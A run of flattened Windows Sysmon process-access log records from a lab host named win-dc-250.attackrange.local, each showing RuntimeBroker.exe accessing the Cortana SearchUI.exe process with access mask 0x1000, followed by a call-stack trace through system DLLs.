13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165264C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011887Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011886Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165264C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011885Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011884Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165696C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011883Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011882Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165352C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011881Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165352C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011880Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011879Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.920{08A6967A-4753-6000-0D05-000000009A01}11166068C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011878Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166068C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011877Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165976C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011876Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166120C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011875Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165976C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011874Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+fd3d6|C:\Windows\System32\windows.storage.dll+fed38|C:\Windows\system32\windows.cortana.Desktop.dll+f90c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000011873Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11166120C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011872Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165304C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011871Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165304C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41550|C:\Windows\system32\windows.cortana.Desktop.dll+9248|C:\Windows\system32\windows.cortana.Desktop.dll+12c21|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011870Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.storage.dll+63fa1|C:\Windows\System32\windows.storage.dll+669f8|C:\Windows\System32\windows.storage.dll+7b6e4|C:\Windows\System32\windows.storage.dll+17478b|C:\Windows\system32\windows.cortana.Desktop.dll+fbaa|C:\Windows\system32\windows.cortana.Desktop.dll+f80b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba 10341000x800000000000000011869Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.904{08A6967A-4753-6000-0D05-000000009A01}11165296C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\windows.cortana.Desktop.dll+41792|C:\Windows\system32\windows.cortana.Desktop.dll+41838|C:\Windows\system32\windows.cortana.Desktop.dll+164d7|C:\Windows\system32\windows.cortana.Desktop.dll+12c8b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d 10341000x800000000000000011868Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 